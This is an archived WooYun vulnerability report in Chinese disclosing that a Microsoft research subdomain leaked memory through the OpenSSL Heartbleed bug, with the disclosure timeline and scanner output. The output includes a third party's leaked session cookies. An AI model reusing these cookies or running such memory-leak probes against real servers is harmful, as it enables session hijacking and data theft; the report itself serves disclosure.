乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-09: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-12-24: 厂商已经主动忽略漏洞,细节向公众公开
microsoft.com某站点存在OpenSSL HeartBleed漏洞,验证可读Cookie
https://ds3.research.microsoft.com存在OpenSSL HeartBleed漏洞。验证可读 cookie。
我只读ascii字符。
D:\Scanner\openSSL>new_test.py ds3.research.microsoft.comConnecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 5466 ... received message: type = 22, ver = 0302, length = 525 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response:[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.TML, like Gecko) Chrome/38.0.2125.111 Safari/537.36..Referer: https://www.google.com/..Accept-Encoding: gzip,deflate,sdch..Accept-Language: en-US,en;q=0.8..Cookie: MC1=GUID=4e3448c8d79b4d4aa81071b43a78de0b&HASH=4e34&LV=20143&V=4&LU=1393696433656; A=I&I=AxUFAAAAAAB7CQAAmpSqxu5E+Krf9iqiJBT3EA!!&V=4; WT_NVR_RU=0=msdn:1=:2=; msdn=L=en-US; msresearch=%7B%22version%22%3A%225.0%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1397427833081%7D%2C%22lastinvited%22%3A1407896151170%2C%22userid%22%3A%2213974278330814520944328978658%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p218292485%22%2C%22p234872763%22%5D%2C%22graceperiod%22%3A5%2C%22trackertimestamp%22%3A0%7D; _wt.user-736484=WT3smkaDVP04tKDsICBO78vzTOfmRGF9kr4D8pDCJNqhxod3lzVJUHj0FYF_lzUHe5czp6DBBMYUTJmYzKiEZOmSWEyyhKiWZt4LHFpo1aePA2TXTYzYKPEXF5lIOYVs0iymmyPAWnFoAQsPvy4nud9_B79we84ls2i0QRNqpRbv-CWV3p89_PO2iAemiK4v5w5zcr1GjeaLeUyw0Nc; _wt.control-736484-ta_FreeDownlaods=WT3BloHw5jb4Lqr21ktnTLR60cBtOEhxFU4lBDusqxRzj3rM3NrnpNljm03sS5xi-9fnqYYjiCuSqyyb_H74MBZmcH-HP2wvDNTdlUtsgy8Ywp9piB3JJYO2C5Tllw41vvOm5zlhqtUSIBwbly86oLQHOmJRy9H3KyXBleB6o1p9HOO52PDtoQed3_agAtgjMiXW3_EEPUgsDwFrPFhRJdZw3hQbVV3QgyEABgW4VVd6VUdm7jNcLwt2DY4qXvogbIMNtQK03OKJYhugiUB; MSFPC=ID=4e3448c8d79b4d4aa81071b43a78de0b&CS=3&LV=201409&V=1; ANON=A=9EE784A569939CAEF3535474FFFFFFFF&E=fba&W=1; NAP=V=1.9&E=f60&C=BsqNVzS2WcEsPHKmzRwfU25ZKDFhLjrHS0uSQkLdUNlD65zGyM6DwA&W=1; MUID=146D9A1D651B66A93C639FED611B6451; smcexpticket=100; omniID=1397427742511_a41a_868c_fccd_ca3032ac1f8c; s_cc=true; s_sq=%5B%5BB%5D%5D; TocPosition=1; WT_FPC=id=1e4bbeb0-f358-4a25-be79-c94f5dd99600:lv=1415220010228:ss=1415218748608 ..:IzWARNING: server returned more data than it should - server is vulnerable!
upgrade
未能联系到厂商或者厂商积极拒绝